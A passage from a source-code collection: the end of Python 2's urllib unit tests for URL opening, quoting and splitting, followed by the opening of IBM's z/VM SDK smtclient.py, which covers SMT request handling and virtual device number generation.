Location: file://guidocomputer.athome.com:/python/license
Connection: close
''')
try:
self.assertRaises(IOError, urllib.urlopen,
"http://something")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp('')
try:
self.assertRaises(IOError, urllib.urlopen, 'http://something')
finally:
self.unfakehttp()
def test_missing_localfile(self):
self.assertRaises(IOError, urllib.urlopen,
'file://localhost/a/missing/file.py')
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
self.assertTrue(os.path.exists(tmp_file))
try:
fp = urllib.urlopen(tmp_fileurl)
fp.close()
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
self.assertRaises(IOError, urllib.urlopen, tmp_fileurl)
def test_ftp_nonexisting(self):
self.assertRaises(IOError, urllib.urlopen,
'ftp://localhost/not/existing/file.py')
def test_userpass_inurl(self):
self.fakehttp('Hello!')
try:
fakehttp_wrapper = httplib.HTTP._connection_class
fp = urllib.urlopen("http://user:pass@python.org/")
authorization = ("Authorization: Basic %s\r\n" %
b64encode('user:pass'))
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf)
self.assertEqual(fp.readline(), "Hello!")
self.assertEqual(fp.readline(), "")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_with_spaces_inurl(self):
self.fakehttp('Hello!')
try:
url = "http://a b:c d@python.org/"
fakehttp_wrapper = httplib.HTTP._connection_class
authorization = ("Authorization: Basic %s\r\n" %
b64encode('a b:c d'))
fp = urllib.urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf)
self.assertEqual(fp.readline(), "Hello!")
self.assertEqual(fp.readline(), "")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(test_support.TESTFN)
self.text = 'testing urllib.urlretrieve'
try:
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
def createNewTempFile(self, data=""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assertIsInstance(result[1], mimetools.Message,
"did not get a mimetools.Message instance as "
"second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.urlretrieve(self.constructLocalFileUrl(
test_support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assertIsInstance(count, int)
self.assertIsInstance(block_size, int)
self.assertIsInstance(total_size, int)
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.urlretrieve(self.constructLocalFileUrl(test_support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 5)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 8193)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp('''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
try:
self.assertRaises(urllib.ContentTooShortError, urllib.urlretrieve,
'http://example.com', reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp('''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
try:
self.assertRaises(urllib.ContentTooShortError, urllib.urlretrieve, 'http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
result = urllib.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
self.assertRaises(TypeError, urllib.quote, None)
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = '\xab\xea'
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquote_with_unicode(self):
r = urllib.unquote(u'br%C3%BCckner_sapporo_20050930.doc')
self.assertEqual(r, u'br\xc3\xbcckner_sapporo_20050930.doc')
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the nturl2path library')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.url2pathname(url)
self.assertEqual(expect, result,
'nturl2path.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
'nturl2path.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
# In Python 3 this test class is moved to test_urlparse.
def test_splittype(self):
splittype = urllib.splittype
self.assertEqual(splittype('type:opaquestring'), ('type', 'opaquestring'))
self.assertEqual(splittype('opaquestring'), (None, 'opaquestring'))
self.assertEqual(splittype(':opaquestring'), (None, ':opaquestring'))
self.assertEqual(splittype('type:'), ('type', ''))
self.assertEqual(splittype('type:opaque:string'), ('type', 'opaque:string'))
def test_splithost(self):
splithost = urllib.splithost
self.assertEqual(splithost('//www.example.org:80/foo/bar/baz.html'),
('www.example.org:80', '/foo/bar/baz.html'))
self.assertEqual(splithost('//www.example.org:80'),
('www.example.org:80', ''))
self.assertEqual(splithost('/foo/bar/baz.html'),
(None, '/foo/bar/baz.html'))
# bpo-30500: # starts a fragment.
self.assertEqual(splithost('//127.0.0.1#@host.com'),
('127.0.0.1', '/#@host.com'))
self.assertEqual(splithost('//127.0.0.1#@host.com:80'),
('127.0.0.1', '/#@host.com:80'))
self.assertEqual(splithost('//127.0.0.1:80#@host.com'),
('127.0.0.1:80', '/#@host.com'))
# Empty host is returned as empty string.
self.assertEqual(splithost("///file"),
('', '/file'))
# Trailing semicolon, question mark and hash symbol are kept.
self.assertEqual(splithost("//example.net/file;"),
('example.net', '/file;'))
self.assertEqual(splithost("//example.net/file?"),
('example.net', '/file?'))
self.assertEqual(splithost("//example.net/file#"),
('example.net', '/file#'))
def test_splituser(self):
splituser = urllib.splituser
self.assertEqual(splituser('User:Pass@www.python.org:080'),
('User:Pass', 'www.python.org:080'))
self.assertEqual(splituser('@www.python.org:080'),
('', 'www.python.org:080'))
self.assertEqual(splituser('www.python.org:080'),
(None, 'www.python.org:080'))
self.assertEqual(splituser('User:Pass@'),
('User:Pass', ''))
self.assertEqual(splituser('User@example.com:Pass@www.python.org:080'),
('User@example.com:Pass', 'www.python.org:080'))
def test_splitpasswd(self):
# Some of the password examples are not sensible, but it is added to
# confirming to RFC2617 and addressing issue4675.
splitpasswd = urllib.splitpasswd
self.assertEqual(splitpasswd('user:ab'), ('user', 'ab'))
self.assertEqual(splitpasswd('user:a\nb'), ('user', 'a\nb'))
self.assertEqual(splitpasswd('user:a\tb'), ('user', 'a\tb'))
self.assertEqual(splitpasswd('user:a\rb'), ('user', 'a\rb'))
self.assertEqual(splitpasswd('user:a\fb'), ('user', 'a\fb'))
self.assertEqual(splitpasswd('user:a\vb'), ('user', 'a\vb'))
self.assertEqual(splitpasswd('user:a:b'), ('user', 'a:b'))
self.assertEqual(splitpasswd('user:a b'), ('user', 'a b'))
self.assertEqual(splitpasswd('user 2:ab'), ('user 2', 'ab'))
self.assertEqual(splitpasswd('user+1:a+b'), ('user+1', 'a+b'))
self.assertEqual(splitpasswd('user:'), ('user', ''))
self.assertEqual(splitpasswd('user'), ('user', None))
self.assertEqual(splitpasswd(':ab'), ('', 'ab'))
def test_splitport(self):
splitport = urllib.splitport
self.assertEqual(splitport('parrot:88'), ('parrot', '88'))
self.assertEqual(splitport('parrot'), ('parrot', None))
self.assertEqual(splitport('parrot:'), ('parrot', None))
self.assertEqual(splitport('127.0.0.1'), ('127.0.0.1', None))
self.assertEqual(splitport('parrot:cheese'), ('parrot:cheese', None))
self.assertEqual(splitport('[::1]:88'), ('[::1]', '88'))
self.assertEqual(splitport('[::1]'), ('[::1]', None))
self.assertEqual(splitport(':88'), ('', '88'))
def test_splitnport(self):
splitnport = urllib.splitnport
self.assertEqual(splitnport('parrot:88'), ('parrot', 88))
self.assertEqual(splitnport('parrot'), ('parrot', -1))
self.assertEqual(splitnport('parrot', 55), ('parrot', 55))
self.assertEqual(splitnport('parrot:'), ('parrot', -1))
self.assertEqual(splitnport('parrot:', 55), ('parrot', 55))
self.assertEqual(splitnport('127.0.0.1'), ('127.0.0.1', -1))
self.assertEqual(splitnport('127.0.0.1', 55), ('127.0.0.1', 55))
self.assertEqual(splitnport('parrot:cheese'), ('parrot', None))
self.assertEqual(splitnport('parrot:cheese', 55), ('parrot', None))
def test_splitquery(self):
# Normal cases are exercised by other tests; ensure that we also
# catch cases with no port specified (testcase ensuring coverage)
splitquery = urllib.splitquery
self.assertEqual(splitquery('http://python.org/fake?foo=bar'),
('http://python.org/fake', 'foo=bar'))
self.assertEqual(splitquery('http://python.org/fake?foo=bar?'),
('http://python.org/fake?foo=bar', ''))
self.assertEqual(splitquery('http://python.org/fake'),
('http://python.org/fake', None))
self.assertEqual(splitquery('?foo=bar'), ('', 'foo=bar'))
def test_splittag(self):
splittag = urllib.splittag
self.assertEqual(splittag('http://example.com?foo=bar#baz'),
('http://example.com?foo=bar', 'baz'))
self.assertEqual(splittag('http://example.com?foo=bar#'),
('http://example.com?foo=bar', ''))
self.assertEqual(splittag('#baz'), ('', 'baz'))
self.assertEqual(splittag('http://example.com?foo=bar'),
('http://example.com?foo=bar', None))
self.assertEqual(splittag('http://example.com?foo=bar#baz#boo'),
('http://example.com?foo=bar#baz', 'boo'))
def test_splitattr(self):
splitattr = urllib.splitattr
self.assertEqual(splitattr('/path;attr1=value1;attr2=value2'),
('/path', ['attr1=value1', 'attr2=value2']))
self.assertEqual(splitattr('/path;'), ('/path', ['']))
self.assertEqual(splitattr(';attr1=value1;attr2=value2'),
('', ['attr1=value1', 'attr2=value2']))
self.assertEqual(splitattr('/path'), ('/path', []))
def test_splitvalue(self):
# Normal cases are exercised by other tests; test pathological cases
# with no key/value pairs. (testcase ensuring coverage)
splitvalue = urllib.splitvalue
self.assertEqual(splitvalue('foo=bar'), ('foo', 'bar'))
self.assertEqual(splitvalue('foo='), ('foo', ''))
self.assertEqual(splitvalue('=bar'), ('', 'bar'))
self.assertEqual(splitvalue('foobar'), ('foobar', None))
self.assertEqual(splitvalue('foo=bar=baz'), ('foo', 'bar=baz'))
def test_toBytes(self):
result = urllib.toBytes(u'http://www.python.org')
self.assertEqual(result, 'http://www.python.org')
self.assertRaises(UnicodeError, urllib.toBytes,
test_support.u(r'http://www.python.org/medi\u00e6val'))
def test_unwrap(self):
url = urllib.unwrap('<URL:type://host/path>')
self.assertEqual(url, 'type://host/path')
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings('ignore', ".*urllib\.urlopen.*Python 3.0",
DeprecationWarning)
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
urlretrieve_HttpTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
Utility_Tests,
URLopener_Tests,
ProxyTests,
ProxyTests_withOrderedEnv,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
smtclient.py
|
# Copyright 2017,2020 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import hashlib
import math
# On SLES12, we found that if you import urllib.parse later
# than requests, you will find a error like 'not able to load
# urllib.parse, this is because urllib will be in sys.modules
# when first import requests
# as workaround here, we first import urllib then import requests
# later, we need consider to use urllib.request to replace
# requests if that's possible to avoid this kind of issue
from io import IOBase
import shutil
import six.moves.urllib.parse as urlparse
import requests
import threading
import os
import re
import six
import string
import subprocess
import tempfile
from smtLayer import smt
from zvmsdk import config
from zvmsdk import constants as const
from zvmsdk import database
from zvmsdk import exception
from zvmsdk import log
from zvmsdk import returncode
from zvmsdk import utils as zvmutils
CONF = config.CONF
LOG = log.LOG
_LOCK = threading.Lock()
CHUNKSIZE = 4096
_SMT_CLIENT = None
def get_smtclient():
global _SMT_CLIENT
if _SMT_CLIENT is None:
try:
_SMT_CLIENT = zvmutils.import_object(
'zvmsdk.smtclient.SMTClient')
except ImportError:
LOG.error("Unable to get smtclient")
raise ImportError
return _SMT_CLIENT
class SMTClient(object):
def __init__(self):
self._smt = smt.SMT()
self._pathutils = zvmutils.PathUtils()
self._NetDbOperator = database.NetworkDbOperator()
self._GuestDbOperator = database.GuestDbOperator()
self._ImageDbOperator = database.ImageDbOperator()
def _request(self, requestData):
try:
results = self._smt.request(requestData)
except Exception as err:
LOG.error('SMT internal parse encounter error')
raise exception.SDKInternalError(msg=err, modID='smt')
def _is_smt_internal_error(results):
internal_error_list = returncode.SMT_INTERNAL_ERROR
for error in internal_error_list:
if results['overallRC'] != error[0]:
# overallRC does not match, continue next
continue
if error[1] is not None and results['rc'] != error[1]:
# rc match failed
continue
if error[2] is not None and results['rs'] not in error[2]:
# rs match failed
continue
# All match finish successfully, return true
return True
return False
if results['overallRC'] != 0:
results.pop('logEntries')
# Check whether this smt error belongs to internal error, if so,
# raise internal error, otherwise raise clientrequestfailed error
if _is_smt_internal_error(results):
msg = "SMT internal error. Results: %s" % str(results)
LOG.error(msg)
raise exception.SDKInternalError(msg=msg,
modID='smt',
results=results)
else:
msg = ("SMT request failed. RequestData: '%s', Results: '%s'"
% (requestData, str(results)))
raise exception.SDKSMTRequestFailed(results, msg)
return results
def get_guest_temp_path(self, userid):
return self._pathutils.get_guest_temp_path(userid)
def get_guest_path(self, userid):
return self._pathutils.get_guest_path(userid)
def clean_temp_folder(self, tmp_folder):
return self._pathutils.clean_temp_folder(tmp_folder)
def _generate_vdev(self, base, offset):
"""Generate virtual device number based on base vdev
:param base: base virtual device number, string of 4 bit hex.
:param offset: offset to base, integer.
"""
vdev = hex(int(base, 16) + offset)[2:]
return vdev.rjust(4, '0')
def _generate_increasing_nic_id(self, nic_id):
"""Generate increasing nic id string
:param nic_id: hexadecimal nic id like '1000'
:return: increasing nic id, string like '0.0.1000,0.0.1001,0.0.1002'
"""
nic_id = str(hex(int(nic_id, 16)))[2:]
nic_id_1 = str(hex(int(nic_id, 16) + 1))[2:]
nic_id_2 = str(hex(int(nic_id, 16) + 2))[2:]
if len(nic_id_2) > 4:
errmsg = ("Virtual device number %s is not valid" % nic_id_2)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return "0.0.%s,0.0.%s,0.0.%s" % (nic_id, nic_id_1, nic_id_2)
def generate_disk_vdev(self, start_vdev=None, offset=0):
"""Generate virtual device number for disks
:param offset: offset of user_root_vdev.
:return: virtual device number, string of 4 bit hex.
"""
if not start_vdev:
start_vdev = CONF.zvm.user_root_vdev
vdev = self._generate_vdev(start_vdev, offset)
if offset >= 0 and offset < 254:
return vdev
else:
msg = ("Failed to generate disk vdev, invalid virtual device"
"number for disk:%s" % vdev)
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
def add_mdisks(self, userid, disk_list, start_vdev=None):
"""Add disks for the userid
:disks: A list dictionary to describe disk info, for example:
disk: [{'size': '1g',
'format': 'ext3',
'disk_pool': 'ECKD:eckdpool1'}]
"""
for idx, disk in enumerate(disk_list):
if 'vdev' in disk:
# this means user want to create their own device number
vdev = disk['vdev']
else:
